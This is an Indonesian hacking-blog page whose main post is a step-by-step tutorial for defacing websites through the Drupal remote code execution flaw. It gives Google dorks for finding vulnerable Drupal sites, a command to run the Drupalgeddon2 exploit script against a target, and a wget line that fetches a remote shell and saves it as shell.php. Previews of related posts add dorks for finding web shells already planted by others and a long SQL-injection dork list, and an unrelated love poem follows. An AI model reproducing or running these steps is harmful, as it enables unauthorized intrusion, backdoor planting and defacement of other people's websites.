Deface Metode Drupal RCE ( Remote Code Execution )

ok kembali lagi dengan saya EssesCyber7 awokawok kali ini gw akan membawakan tutorial deface debgan metode Drupal Rce.

ok langsung saja ganz

Remote Code Execution adalah sama seperti arbitary code execution, dimana membuat attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, bedanya dengan Remote Code Execution adalah sang attacker melakukan injeksi coding melalui dengan mesin yang berbeda, maksudnya dilakukan secara remote terhadap mesin target.

Bahan Yang Dibutuhkan :

Tools Drupalgeddon2

Linux / Termux

Shell Backdoor

Dork :

inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied"

inurl:"user/register?element_parents=account/mail"

inurl:"*drupal_ajax"

kembangin lagi dork nya dengan otak bokep lu:)

harus kalian lakukan pertama kali adalah buka tools nya terlebih dahulu di termux atau linux kalian, lalu kita ngedork dengan dork yang sudah di sediakan di atas, atau bisa kalian kembangkan lagi.

Lalu buka terminal / termux dan ketikkan

$ ruby drupalgeddon2.rb targetkalian.com

Dan jika exploit kalian berhasil, maka akan muncul seperti ini.

Lalu tinggal upload shell/script kalian yang sudah terupload di dalam website dengan menggunakan wget, contoh nya.

$ wget http://web.com/shell.txt -O shell.php

Tinggal kalian akses shell/script kalian.

Demikian tutorial Deface Drupal RCE kali ini, semoga bermanfaat. jangan lupa baca artikel sebelumnya yang sangat bermanfaat

Comments

Deface Poc Dorking Shell

Deface Poc Dorking Shell Assalamualaikum Wr Wb kali ini saya akan share tentang Deface Poc Dorking Shell okee langsung saja gaskeunn.... Bahan 1. Dork : inurl:minishell.php intext:shell intitle:Mini Shell inurl:mini.php intitle:IndoXploit inurl:idx.php *kembangin sendiri aja ok 2. Sabar cuy 😂 tak semudah itu mendapatkannya, karena kadang shell nya sudah ngga karena keduluan ama orang :voss 3. Kopi ea biar ga ngantuk - langsung saja dorking dengan dork di atas - lalu kita buka tuh web yang muncul satu per satu sampe dapet 😂 - dan hore saya dapet euyy - sekarang kalian tinggal upload shell milik kalian atau script deface oke mungkin cukup sekian tutorial kali ini see you on the next tutorial and peaceeeee 😀

Dork SQL Injection 2019

Hallo kali ini saya akan memberikan Dork untuk SQL Injection Yaps langsung saja di comot :p Dork ini bersumber dari : https://www.nextleveltricks.com/latest-google-dorks-list/ Ok langsung saja about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= c...

Ini Aku.

Ini aku, perempuan yang diam-diam menatapmu dalam bisu. Perempuan yang tidak akan masuk dalam kriteria yang kau cari karena aku memang tidak pernah sepantas itu. Ini aku, perempuan yg diam-diam memotretmu dari kejauhan. perempuan kaku yang enggan berbincang denganmu karena aku memang tidak pandai berkata-kata dihadapanmu. Ini aku, perempuan yang berusaha sekuat tenaga bersikap biasa saja saat berpapasan denganmu, yang berusaha memasang senyum semanis mungkin agar kau tertarik denganku padahal sama sekali tidak. Ini aku, perempuan yang diam-diam mengagumimu dalam kebisuannya, yang selalu ber angan-angan agar kita menjadi sepasang manusia yang saling membahagiakan padahal tidak akan pada satu jalan takdir. -dari aku yang mengagumimu dalam diam. Red Creator

1 in 3 Red Creator

Search This Blog